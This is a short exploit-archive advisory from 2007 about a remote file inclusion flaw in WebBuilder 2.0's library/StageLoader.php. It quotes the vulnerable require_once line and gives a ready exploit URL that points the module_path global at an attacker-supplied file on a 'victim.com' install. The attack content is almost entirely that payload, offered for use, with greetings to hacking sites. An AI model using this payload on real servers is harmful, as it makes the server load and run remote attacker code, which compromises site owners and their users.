WebBuilder 2.0 (StageLoader.php) Remote File Include Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : WebBuilder 2.0 (StageLoader.php) Remote File Include Vulnerability
# Published : 2007-02-01
# Author : GoLd_M
# Previous Title : phpEventMan 1.0.2 (level) Remote File Include Vulnerabilities
# Next Title : Epistemon 1.0 (common.php inc_path) Remote File Include Vulnerability

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
WebBuilder <= 2.0 Remote File Include Vulnerability *
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Discovered by GolD_M(Mahmnood_ali) & &  Contact: HackEr_@W.Cn *
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
URL: *
http://oss.backendmedia.com/snapshots/webbuilder2-2006-08-18.zip *
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
V.CODE: In : /library/StageLoader.php *
require_once($GLOBALS['core']['module_path'].'/module_common.php'); *
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Exploit: *
http://victim.com/[path]/library/StageLoader.php?GLOBALS[core][module_path]=Evil.txt?  *
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Thanx : Tryag.Com & DwRaT.Com & Asb-May.Net & Milw0rm.com & H4cky0u.Com & Google.Com     *
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

# www.Syue.com [2007-02-01]